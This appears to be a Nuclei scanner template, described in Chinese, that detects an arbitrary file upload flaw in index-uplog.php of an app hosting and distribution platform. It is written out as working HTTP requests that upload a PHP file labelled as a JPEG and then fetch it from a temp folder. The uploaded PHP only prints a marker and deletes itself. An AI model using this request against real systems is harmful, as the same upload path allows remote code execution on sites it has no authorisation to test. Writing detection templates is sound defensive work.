id: app-distribution-platform-fileupload

info:
  name: App托管服务分发平台index-uplog.php存在任意文件上传漏洞
  author: qwtd
  severity: critical
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%88%86%E5%8F%91%E7%AD%BE%E5%90%8D%E7%B3%BB%E7%BB%9F/APP%E5%88%86%E5%8F%91%E7%AD%BE%E5%90%8D%E7%B3%BB%E7%BB%9Findex-uplog.php%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  tags: App托管服务分发平台
  description: |
    App托管服务分发平台中的index-uplog.php文件存在任意文件上传漏洞，攻击者可以通过上传恶意脚本来执行任意代码。

variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'

http:
  - raw:
      - |
        POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfF7NbGp0PAFq8Mkd
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}/source/pack/upload/2upload/index-uplog.php
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36

        ------WebKitFormBoundaryfF7NbGp0PAFq8Mkd
        Content-Disposition: form-data; name="time"

        {{rand1}}-{{rand2}}
        ------WebKitFormBoundaryfF7NbGp0PAFq8Mkd
        Content-Disposition: form-data; name="app"; filename="1.php"
        Content-Type: image/jpeg

        <?php print('{{randstr}}');unlink(__FILE__);?>
        ------WebKitFormBoundaryfF7NbGp0PAFq8Mkd--

      - |
        GET /source/data/tmp/{{rand1}}-{{rand2}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body_2
        words:
          - "{{randstr}}"